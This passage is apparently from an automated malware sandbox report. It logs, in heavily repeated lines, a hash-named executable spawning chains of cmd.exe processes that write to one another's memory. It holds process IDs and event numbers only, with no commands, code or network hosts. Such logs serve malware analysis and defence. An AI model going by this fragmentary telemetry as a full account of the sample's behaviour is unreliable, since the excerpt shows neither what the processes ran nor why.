1492 wrote to memory of 976 1492 cmd.exe 887 PID 1492 wrote to memory of 976 1492 cmd.exe 887 PID 1492 wrote to memory of 976 1492 cmd.exe 887 PID 1492 wrote to memory of 1212 1492 cmd.exe 888 PID 1492 wrote to memory of 1212 1492 cmd.exe 888 PID 1492 wrote to memory of 1212 1492 cmd.exe 888 PID 1492 wrote to memory of 1212 1492 cmd.exe 888 PID 1492 wrote to memory of 1340 1492 cmd.exe 889 PID 1492 wrote to memory of 1340 1492 cmd.exe 889 PID 1492 wrote to memory of 1340 1492 cmd.exe 889 PID 1492 wrote to memory of 1340 1492 cmd.exe 889 PID 1340 wrote to memory of 1784 1340 cmd.exe 890 PID 1340 wrote to memory of 1784 1340 cmd.exe 890 PID 1340 wrote to memory of 1784 1340 cmd.exe 890 PID 1340 wrote to memory of 1784 1340 cmd.exe 890 PID 1492 wrote to memory of 1468 1492 cmd.exe 891 PID 1492 wrote to memory of 1468 1492 cmd.exe 891 PID 1492 wrote to memory of 1468 1492 cmd.exe 891 PID 1492 wrote to memory of 1468 1492 cmd.exe 891 PID 616 wrote to memory of 1460 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 892 PID 616 wrote to memory of 1460 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 892 PID 616 wrote to memory of 1460 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 892 PID 616 wrote to memory of 1460 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 892 PID 1460 wrote to memory of 1584 1460 cmd.exe 894 PID 1460 wrote to memory of 1584 1460 cmd.exe 894 PID 1460 wrote to memory of 1584 1460 cmd.exe 894 PID 1460 wrote to memory of 1584 1460 cmd.exe 894 PID 1460 wrote to memory of 1936 1460 cmd.exe 895 PID 1460 wrote to memory of 1936 1460 cmd.exe 895 PID 1460 wrote to memory of 1936 1460 cmd.exe 895 PID 1460 wrote to memory of 1936 1460 cmd.exe 895 PID 1460 wrote to memory of 1956 1460 cmd.exe 896 PID 1460 wrote to memory of 1956 1460 cmd.exe 896 PID 1460 wrote to memory of 1956 1460 cmd.exe 896 PID 1460 wrote to memory of 1956 1460 cmd.exe 896 PID 1956 wrote to memory of 1980 1956 cmd.exe 897 PID 1956 wrote to memory of 1980 1956 cmd.exe 897 PID 1956 wrote to memory of 1980 1956 cmd.exe 897 PID 1956 wrote to memory of 1980 1956 cmd.exe 897 PID 1460 wrote to memory of 1756 1460 cmd.exe 898 PID 1460 wrote to memory of 1756 1460 cmd.exe 898 PID 1460 wrote to memory of 1756 1460 cmd.exe 898 PID 1460 wrote to memory of 1756 1460 cmd.exe 898 PID 616 wrote to memory of 964 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 899 PID 616 wrote to memory of 964 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 899 PID 616 wrote to memory of 964 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 899 PID 616 wrote to memory of 964 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 899 PID 964 wrote to memory of 680 964 cmd.exe 901 PID 964 wrote to memory of 680 964 cmd.exe 901 PID 964 wrote to memory of 680 964 cmd.exe 901 PID 964 wrote to memory of 680 964 cmd.exe 901 PID 964 wrote to memory of 2040 964 cmd.exe 902 PID 964 wrote to memory of 2040 964 cmd.exe 902 PID 964 wrote to memory of 2040 964 cmd.exe 902 PID 964 wrote to memory of 2040 964 cmd.exe 902 PID 964 wrote to memory of 1060 964 cmd.exe 903 PID 964 wrote to memory of 1060 964 cmd.exe 903 PID 964 wrote to memory of 1060 964 cmd.exe 903 PID 964 wrote to memory of 1060 964 cmd.exe 903 PID 1060 wrote to memory of 1944 1060 cmd.exe 904 PID 1060 wrote to memory of 1944 1060 cmd.exe 904 PID 1060 wrote to memory of 1944 1060 cmd.exe 904 PID 1060 wrote to memory of 1944 1060 cmd.exe 904 PID 964 wrote to memory of 436 964 cmd.exe 905 PID 964 wrote to memory of 436 964 cmd.exe 905 PID 964 wrote to memory of 436 964 cmd.exe 905 PID 964 wrote to memory of 436 964 cmd.exe 905 PID 616 wrote to memory of 976 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 906 PID 616 wrote to memory of 976 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 906 PID 616 wrote to memory of 976 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 906 PID 616 wrote to memory of 976 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 906 PID 976 wrote to memory of 1432 976 cmd.exe 908 PID 976 wrote to memory of 1432 976 cmd.exe 908 PID 976 wrote to memory of 1432 976 cmd.exe 908 PID 976 wrote to memory of 1432 976 cmd.exe 908 PID 976 wrote to memory of 972 976 cmd.exe 909 PID 976 wrote to memory of 972 976 cmd.exe 909 PID 976 wrote to memory of 972 976 cmd.exe 909 PID 976 wrote to memory of 972 976 cmd.exe 909 PID 976 wrote to memory of 1996 976 cmd.exe 910 PID 976 wrote to memory of 1996 976 cmd.exe 910 PID 976 wrote to memory of 1996 976 cmd.exe 910 PID 976 wrote to memory of 1996 976 cmd.exe 910 PID 1996 wrote to memory of 1828 1996 cmd.exe 911 PID 1996 wrote to memory of 1828 1996 cmd.exe 911 PID 1996 wrote to memory of 1828 1996 cmd.exe 911 PID 1996 wrote to memory of 1828 1996 cmd.exe 911 PID 976 wrote to memory of 1808 976 cmd.exe 912 PID 976 wrote to memory of 1808 976 cmd.exe 912 PID 976 wrote to memory of 1808 976 cmd.exe 912 PID 976 wrote to memory of 1808 976 cmd.exe 912 PID 616 wrote to memory of 1584 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 913 PID 616 wrote to memory of 1584 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 913 PID 616 wrote to memory of 1584 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 913 PID 616 wrote to memory of 1584 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 913 PID 1584 wrote to memory of 528 1584 cmd.exe 915 PID 1584 wrote to memory of 528 1584 cmd.exe 915 PID 1584 wrote to memory of 528 1584 cmd.exe 915 PID 1584 wrote to memory of 528 1584 cmd.exe 915 PID 1584 wrote to memory of 1680 1584 cmd.exe 916 PID 1584 wrote to memory of 1680 1584 cmd.exe 916 PID 1584 wrote to memory of 1680 1584 cmd.exe 916 PID 1584 wrote to memory of 1680 1584 cmd.exe 916 PID 1584 wrote to memory of 1088 1584 cmd.exe 917 PID 1584 wrote to memory of 1088 1584 cmd.exe 917 PID 1584 wrote to memory of 1088 1584 cmd.exe 917 PID 1584 wrote to memory of 1088 1584 cmd.exe 917 PID 1088 wrote to memory of 368 1088 cmd.exe 918 PID 1088 wrote to memory of 368 1088 cmd.exe 918 PID 1088 wrote to memory of 368 1088 cmd.exe 918 PID 1088 wrote to memory of 368 1088 cmd.exe 918 PID 1584 wrote to memory of 1136 1584 cmd.exe 919 PID 1584 wrote to memory of 1136 1584 cmd.exe 919 PID 1584 wrote to memory of 1136 1584 cmd.exe 919 PID 1584 wrote to memory of 1136 1584 cmd.exe 919 PID 616 wrote to memory of 472 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 920 PID 616 wrote to memory of 472 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 920 PID 616 wrote to memory of 472 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 920 PID 616 wrote to memory of 472 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 920 PID 472 wrote to memory of 860 472 cmd.exe 922 PID 472 wrote to memory of 860 472 cmd.exe 922 PID 472 wrote to memory of 860 472 cmd.exe 922 PID 472 wrote to memory of 860 472 cmd.exe 922 PID 472 wrote to memory of 796 472 cmd.exe 923 PID 472 wrote to memory of 796 472 cmd.exe 923 PID 472 wrote to memory of 796 472 cmd.exe 923 PID 472 wrote to memory of 796 472 cmd.exe 923 PID 472 wrote to memory of 1748 472 cmd.exe 924 PID 472 wrote to memory of 1748 472 cmd.exe 924 PID 472 wrote to memory of 1748 472 cmd.exe 924 PID 472 wrote to memory of 1748 472 cmd.exe 924 PID 1748 wrote to memory of 436 1748 cmd.exe 925 PID 1748 wrote to memory of 436 1748 cmd.exe 925 PID 1748 wrote to memory of 436 1748 cmd.exe 925 PID 1748 wrote to memory of 436 1748 cmd.exe 925 PID 472 wrote to memory of 672 472 cmd.exe 926 PID 472 wrote to memory of 672 472 cmd.exe 926 PID 472 wrote to memory of 672 472 cmd.exe 926 PID 472 wrote to memory of 672 472 cmd.exe 926 PID 616 wrote to memory of 548 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 927 PID 616 wrote to memory of 548 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 927 PID 616 wrote to memory of 548 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 927 PID 616 wrote to memory of 548 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 927 PID 548 wrote to memory of 1492 548 cmd.exe 929 PID 548 wrote to memory of 1492 548 cmd.exe 929 PID 548 wrote to memory of 1492 548 cmd.exe 929 PID 548 wrote to memory of 1492 548 cmd.exe 929 PID 548 wrote to memory of 1828 548 cmd.exe 930 PID 548 wrote to memory of 1828 548 cmd.exe 930 PID 548 wrote to memory of 1828 548 cmd.exe 930 PID 548 wrote to memory of 1828 548 cmd.exe 930 PID 548 wrote to memory of 2032 548 cmd.exe 931 PID 548 wrote to memory of 2032 548 cmd.exe 931 PID 548 wrote to memory of 2032 548 cmd.exe 931 PID 548 wrote to memory of 2032 548 cmd.exe 931 PID 2032 wrote to memory of 1808 2032 cmd.exe 932 PID 2032 wrote to memory of 1808 2032 cmd.exe 932 PID 2032 wrote to memory of 1808 2032 cmd.exe 932 PID 2032 wrote to memory of 1808 2032 cmd.exe 932 PID 548 wrote to memory of 1964 548 cmd.exe 933 PID 548 wrote to memory of 1964 548 cmd.exe 933 PID 548 wrote to memory of 1964 548 cmd.exe 933 PID 548 wrote to memory of 1964 548 cmd.exe 933 PID 616 wrote to memory of 1980 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 934 PID 616 wrote to memory of 1980 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 934 PID 616 wrote to memory of 1980 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 934 PID 616 wrote to memory of 1980 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 934 PID 1980 wrote to memory of 1948 1980 cmd.exe 936 PID 1980 wrote to memory of 1948 1980 cmd.exe 936 PID 1980 wrote to memory of 1948 1980 cmd.exe 936 PID 1980 wrote to memory of 1948 1980 cmd.exe 936 PID 1980 wrote to memory of 1152 1980 cmd.exe 937 PID 1980 wrote to memory of 1152 1980 cmd.exe 937 PID 1980 wrote to memory of 1152 1980 cmd.exe 937 PID 1980 wrote to memory of 1152 1980 cmd.exe 937 PID 1980 wrote to memory of 1776 1980 cmd.exe 938 PID 1980 wrote to memory of 1776 1980 cmd.exe 938 PID 1980 wrote to memory of 1776 1980 cmd.exe 938 PID 1980 wrote to memory of 1776 1980 cmd.exe 938 PID 1776 wrote to memory of 1136 1776 cmd.exe 939 PID 1776 wrote to memory of 1136 1776 cmd.exe 939 PID 1776 wrote to memory of 1136 1776 cmd.exe 939 PID 1776 wrote to memory of 1136 1776 cmd.exe 939 PID 1980 wrote to memory of 1560 1980 cmd.exe 940 PID 1980 wrote to memory of 1560 1980 cmd.exe 940 PID 1980 wrote to memory of 1560 1980 cmd.exe 940 PID 1980 wrote to memory of 1560 1980 cmd.exe 940 PID 616 wrote to memory of 1944 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 941 PID 616 wrote to memory of 1944 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 941 PID 616 wrote to memory of 1944 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 941 PID 616 wrote to memory of 1944 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 941 PID 1944 wrote to memory of 1120 1944 cmd.exe 943 PID 1944 wrote to memory of 1120 1944 cmd.exe 943 PID 1944 wrote to memory of 1120 1944 cmd.exe 943 PID 1944 wrote to memory of 1120 1944 cmd.exe 943 PID 1944 wrote to memory of 220 1944 cmd.exe 944 PID 1944 wrote to memory of 220 1944 cmd.exe 944 PID 1944 wrote to memory of 220 1944 cmd.exe 944 PID 1944 wrote to memory of 220 1944 cmd.exe 944 PID 1944 wrote to memory of 1832 1944 cmd.exe 945 PID 1944 wrote to memory of 1832 1944 cmd.exe 945 PID 1944 wrote to memory of 1832 1944 cmd.exe 945 PID 1944 wrote to memory of 1832 1944 cmd.exe 945 PID 1832 wrote to memory of 1784 1832 cmd.exe 946 PID 1832 wrote to memory of 1784 1832 cmd.exe 946 PID 1832 wrote to memory of 1784 1832 cmd.exe 946 PID 1832 wrote to memory of 1784 1832 cmd.exe 946 PID 1944 wrote to memory of 1796 1944 cmd.exe 947 PID 1944 wrote to memory of 1796 1944 cmd.exe 947 PID 1944 wrote to memory of 1796 1944 cmd.exe 947 PID 1944 wrote to memory of 1796 1944 cmd.exe 947 PID 616 wrote to memory of 1408 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 948 PID 616 wrote to memory of 1408 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 948 PID 616 wrote to memory of 1408 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 948 PID 616 wrote to memory of 1408 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 948 PID 1408 wrote to memory of 688 1408 cmd.exe 950 PID 1408 wrote to memory of 688 1408 cmd.exe 950 PID 1408 wrote to memory of 688 1408 cmd.exe 950 PID 1408 wrote to memory of 688 1408 cmd.exe 950 PID 1408 wrote to memory of 1808 1408 cmd.exe 951 PID 1408 wrote to memory of 1808 1408 cmd.exe 951 PID 1408 wrote to memory of 1808 1408 cmd.exe 951 PID 1408 wrote to memory of 1808 1408 cmd.exe 951 PID 1408 wrote to memory of 1868 1408 cmd.exe 952 PID 1408 wrote to memory of 1868 1408 cmd.exe 952 PID 1408 wrote to memory of 1868 1408 cmd.exe 952 PID 1408 wrote to memory of 1868 1408 cmd.exe 952 PID 1868 wrote to memory of 1964 1868 cmd.exe 953 PID 1868 wrote to memory of 1964 1868 cmd.exe 953 PID 1868 wrote to memory of 1964 1868 cmd.exe 953 PID 1868 wrote to memory of 1964 1868 cmd.exe 953 PID 1408 wrote to memory of 908 1408 cmd.exe 954 PID 1408 wrote to memory of 908 1408 cmd.exe 954 PID 1408 wrote to memory of 908 1408 cmd.exe 954 PID 1408 wrote to memory of 908 1408 cmd.exe 954 PID 616 wrote to memory of 1476 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 955 PID 616 wrote to memory of 1476 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 955 PID 616 wrote to memory of 1476 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 955 PID 616 wrote to memory of 1476 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 955 PID 1476 wrote to memory of 2036 1476 cmd.exe 957 PID 1476 wrote to memory of 2036 1476 cmd.exe 957 PID 1476 wrote to memory of 2036 1476 cmd.exe 957 PID 1476 wrote to memory of 2036 1476 cmd.exe 957 PID 1476 wrote to memory of 624 1476 cmd.exe 958 PID 1476 wrote to memory of 624 1476 cmd.exe 958 PID 1476 wrote to memory of 624 1476 cmd.exe 958 PID 1476 wrote to memory of 624 1476 cmd.exe 958 PID 1476 wrote to memory of 1776 1476 cmd.exe 959 PID 1476 wrote to memory of 1776 1476 cmd.exe 959 PID 1476 wrote to memory of 1776 1476 cmd.exe 959 PID 1476 wrote to memory of 1776 1476 cmd.exe 959 PID 1776 wrote to memory of 564 1776 cmd.exe 960 PID 1776 wrote to memory of 564 1776 cmd.exe 960 PID 1776 wrote to memory of 564 1776 cmd.exe 960 PID 1776 wrote to memory of 564 1776 cmd.exe 960 PID 1476 wrote to memory of 1980 1476 cmd.exe 961 PID 1476 wrote to memory of 1980 1476 cmd.exe 961 PID 1476 wrote to memory of 1980 1476 cmd.exe 961 PID 1476 wrote to memory of 1980 1476 cmd.exe 961 PID 616 wrote to memory of 224 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 962 PID 616 wrote to memory of 224 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 962 PID 616 wrote to memory of 224 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 962 PID 616 wrote to memory of 224 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 962 PID 224 wrote to memory of 672 224 cmd.exe 964 PID 224 wrote to memory of 672 224 cmd.exe 964 PID 224 wrote to memory of 672 224 cmd.exe 964 PID 224 wrote to memory of 672 224 cmd.exe 964 PID 224 wrote to memory of 228 224 cmd.exe 965 PID 224 wrote to memory of 228 224 cmd.exe 965 PID 224 wrote to memory of 228 224 cmd.exe 965 PID 224 wrote to memory of 228 224 cmd.exe 965 PID 224 wrote to memory of 1832 224 cmd.exe 966 PID 224 wrote to memory of 1832 224 cmd.exe 966 PID 224 wrote to memory of 1832 224 cmd.exe 966 PID 224 wrote to memory of 1832 224 cmd.exe 966 PID 1832 wrote to memory of 952 1832 cmd.exe 967 PID 1832 wrote to memory of 952 1832 cmd.exe 967 PID 1832 wrote to memory of 952 1832 cmd.exe 967 PID 1832 wrote to memory of 952 1832 cmd.exe 967 PID 224 wrote to memory of 860 224 cmd.exe 968 PID 224 wrote to memory of 860 224 cmd.exe 968 PID 224 wrote to memory of 860 224 cmd.exe 968 PID 224 wrote to memory of 860 224 cmd.exe 968 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 969 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 969 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 969 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 969 PID 1828 wrote to memory of 1808 1828 cmd.exe 971 PID 1828 wrote to memory of 1808 1828 cmd.exe 971 PID 1828 wrote to memory of 1808 1828 cmd.exe 971 PID 1828 wrote to memory of 1808 1828 cmd.exe 971 PID 1828 wrote to memory of 972 1828 cmd.exe 972 PID 1828 wrote to memory of 972 1828 cmd.exe 972 PID 1828 wrote to memory of 972 1828 cmd.exe 972 PID 1828 wrote to memory of 972 1828 cmd.exe 972 PID 1828 wrote to memory of 1168 1828 cmd.exe 973 PID 1828 wrote to memory of 1168 1828 cmd.exe 973 PID 1828 wrote to memory of 1168 1828 cmd.exe 973 PID 1828 wrote to memory of 1168 1828 cmd.exe 973 PID 1168 wrote to memory of 836 1168 cmd.exe 974 PID 1168 wrote to memory of 836 1168 cmd.exe 974 PID 1168 wrote to memory of 836 1168 cmd.exe 974 PID 1168 wrote to memory of 836 1168 cmd.exe 974 PID 1828 wrote to memory of 1492 1828 cmd.exe 975 PID 1828 wrote to memory of 1492 1828 cmd.exe 975 PID 1828 wrote to memory of 1492 1828 cmd.exe 975 PID 1828 wrote to memory of 1492 1828 cmd.exe 975 PID 616 wrote to memory of 1460 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 976 PID 616 wrote to memory of 1460 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 976 PID 616 wrote to memory of 1460 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 976 PID 616 wrote to memory of 1460 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 976 PID 1460 wrote to memory of 1744 1460 cmd.exe 978 PID 1460 wrote to memory of 1744 1460 cmd.exe 978 PID 1460 wrote to memory of 1744 1460 cmd.exe 978 PID 1460 wrote to memory of 1744 1460 cmd.exe 978 PID 1460 wrote to memory of 1960 1460 cmd.exe 979 PID 1460 wrote to memory of 1960 1460 cmd.exe 979 PID 1460 wrote to memory of 1960 1460 cmd.exe 979 PID 1460 wrote to memory of 1960 1460 cmd.exe 979 PID 1460 wrote to memory of 1684 1460 cmd.exe 980 PID 1460 wrote to memory of 1684 1460 cmd.exe 980 PID 1460 wrote to memory of 1684 1460 cmd.exe 980 PID 1460 wrote to memory of 1684 1460 cmd.exe 980 PID 1684 wrote to memory of 2040 1684 cmd.exe 981 PID 1684 wrote to memory of 2040 1684 cmd.exe 981 PID 1684 wrote to memory of 2040 1684 cmd.exe 981 PID 1684 wrote to memory of 2040 1684 cmd.exe 981 PID 1460 wrote to memory of 1756 1460 cmd.exe 982 PID 1460 wrote to memory of 1756 1460 cmd.exe 982 PID 1460 wrote to memory of 1756 1460 cmd.exe 982 PID 1460 wrote to memory of 1756 1460 cmd.exe 982 PID 616 wrote to memory of 1088 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 983 PID 616 wrote to memory of 1088 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 983 PID 616 wrote to memory of 1088 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 983 PID 616 wrote to memory of 1088 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 983 PID 1088 wrote to memory of 672 1088 cmd.exe 985 PID 1088 wrote to memory of 672 1088 cmd.exe 985 PID 1088 wrote to memory of 672 1088 cmd.exe 985 PID 1088 wrote to memory of 672 1088 cmd.exe 985 PID 1088 wrote to memory of 1788 1088 cmd.exe 986 PID 1088 wrote to memory of 1788 1088 cmd.exe 986 PID 1088 wrote to memory of 1788 1088 cmd.exe 986 PID 1088 wrote to memory of 1788 1088 cmd.exe 986 PID 1088 wrote to memory of 964 1088 cmd.exe 987 PID 1088 wrote to memory of 964 1088 cmd.exe 987 PID 1088 wrote to memory of 964 1088 cmd.exe 987 PID 1088 wrote to memory of 964 1088 cmd.exe 987 PID 964 wrote to memory of 1340 964 cmd.exe 988 PID 964 wrote to memory of 1340 964 cmd.exe 988 PID 964 wrote to memory of 1340 964 cmd.exe 988 PID 964 wrote to memory of 1340 964 cmd.exe 988 PID 1088 wrote to memory of 1944 1088 cmd.exe 989 PID 1088 wrote to memory of 1944 1088 cmd.exe 989 PID 1088 wrote to memory of 1944 1088 cmd.exe 989 PID 1088 wrote to memory of 1944 1088 cmd.exe 989 PID 616 wrote to memory of 1748 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 990 PID 616 wrote to memory of 1748 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 990 PID 616 wrote to memory of 1748 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 990 PID 616 wrote to memory of 1748 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 990 PID 1748 wrote to memory of 1808 1748 cmd.exe 992 PID 1748 wrote to memory of 1808 1748 cmd.exe 992 PID 1748 wrote to memory of 1808 1748 cmd.exe 992 PID 1748 wrote to memory of 1808 1748 cmd.exe 992 PID 1748 wrote to memory of 1956 1748 cmd.exe 993 PID 1748 wrote to memory of 1956 1748 cmd.exe 993 PID 1748 wrote to memory of 1956 1748 cmd.exe 993 PID 1748 wrote to memory of 1956 1748 cmd.exe 993 PID 1748 wrote to memory of 908 1748 cmd.exe 994 PID 1748 wrote to memory of 908 1748 cmd.exe 994 PID 1748 wrote to memory of 908 1748 cmd.exe 994 PID 1748 wrote to memory of 908 1748 cmd.exe 994 PID 908 wrote to memory of 836 908 cmd.exe 995 PID 908 wrote to memory of 836 908 cmd.exe 995 PID 908 wrote to memory of 836 908 cmd.exe 995 PID 908 wrote to memory of 836 908 cmd.exe 995 PID 1748 wrote to memory of 1440 1748 cmd.exe 996 PID 1748 wrote to memory of 1440 1748 cmd.exe 996 PID 1748 wrote to memory of 1440 1748 cmd.exe 996 PID 1748 wrote to memory of 1440 1748 cmd.exe 996 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 997 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 997 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 997 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 997 PID 1828 wrote to memory of 1984 1828 cmd.exe 999 PID 1828 wrote to memory of 1984 1828 cmd.exe 999 PID 1828 wrote to memory of 1984 1828 cmd.exe 999 PID 1828 wrote to memory of 1984 1828 cmd.exe 999 PID 1828 wrote to memory of 1560 1828 cmd.exe 1000 PID 1828 wrote to memory of 1560 1828 cmd.exe 1000 PID 1828 wrote to memory of 1560 1828 cmd.exe 1000 PID 1828 wrote to memory of 1560 1828 cmd.exe 1000 PID 1828 wrote to memory of 660 1828 cmd.exe 1001 PID 1828 wrote to memory of 660 1828 cmd.exe 1001 PID 1828 wrote to memory of 660 1828 cmd.exe 1001 PID 1828 wrote to memory of 660 1828 cmd.exe 1001 PID 660 wrote to memory of 1776 660 cmd.exe 1002 PID 660 wrote to memory of 1776 660 cmd.exe 1002 PID 660 wrote to memory of 1776 660 cmd.exe 1002 PID 660 wrote to memory of 1776 660 cmd.exe 1002 PID 1828 wrote to memory of 368 1828 cmd.exe 1003 PID 1828 wrote to memory of 368 1828 cmd.exe 1003 PID 1828 wrote to memory of 368 1828 cmd.exe 1003 PID 1828 wrote to memory of 368 1828 cmd.exe 1003 PID 616 wrote to memory of 1200 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1004 PID 616 wrote to memory of 1200 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1004 PID 616 wrote to memory of 1200 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1004 PID 616 wrote to memory of 1200 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1004 PID 1200 wrote to memory of 1516 1200 cmd.exe 1006 PID 1200 wrote to memory of 1516 1200 cmd.exe 1006 PID 1200 wrote to memory of 1516 1200 cmd.exe 1006 PID 1200 wrote to memory of 1516 1200 cmd.exe 1006 PID 1200 wrote to memory of 1796 1200 cmd.exe 1007 PID 1200 wrote to memory of 1796 1200 cmd.exe 1007 PID 1200 wrote to memory of 1796 1200 cmd.exe 1007 PID 1200 wrote to memory of 1796 1200 cmd.exe 1007 PID 1200 wrote to memory of 1020 1200 cmd.exe 1008 PID 1200 wrote to memory of 1020 1200 cmd.exe 1008 PID 1200 wrote to memory of 1020 1200 cmd.exe 1008 PID 1200 wrote to memory of 1020 1200 cmd.exe 1008 PID 1020 wrote to memory of 1832 1020 cmd.exe 1009 PID 1020 wrote to memory of 1832 1020 cmd.exe 1009 PID 1020 wrote to memory of 1832 1020 cmd.exe 1009 PID 1020 wrote to memory of 1832 1020 cmd.exe 1009 PID 1200 wrote to memory of 436 1200 cmd.exe 1010 PID 1200 wrote to memory of 436 1200 cmd.exe 1010 PID 1200 wrote to memory of 436 1200 cmd.exe 1010 PID 1200 wrote to memory of 436 1200 cmd.exe 1010 PID 616 wrote to memory of 1948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1011 PID 616 wrote to memory of 1948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1011 PID 616 wrote to memory of 1948 616 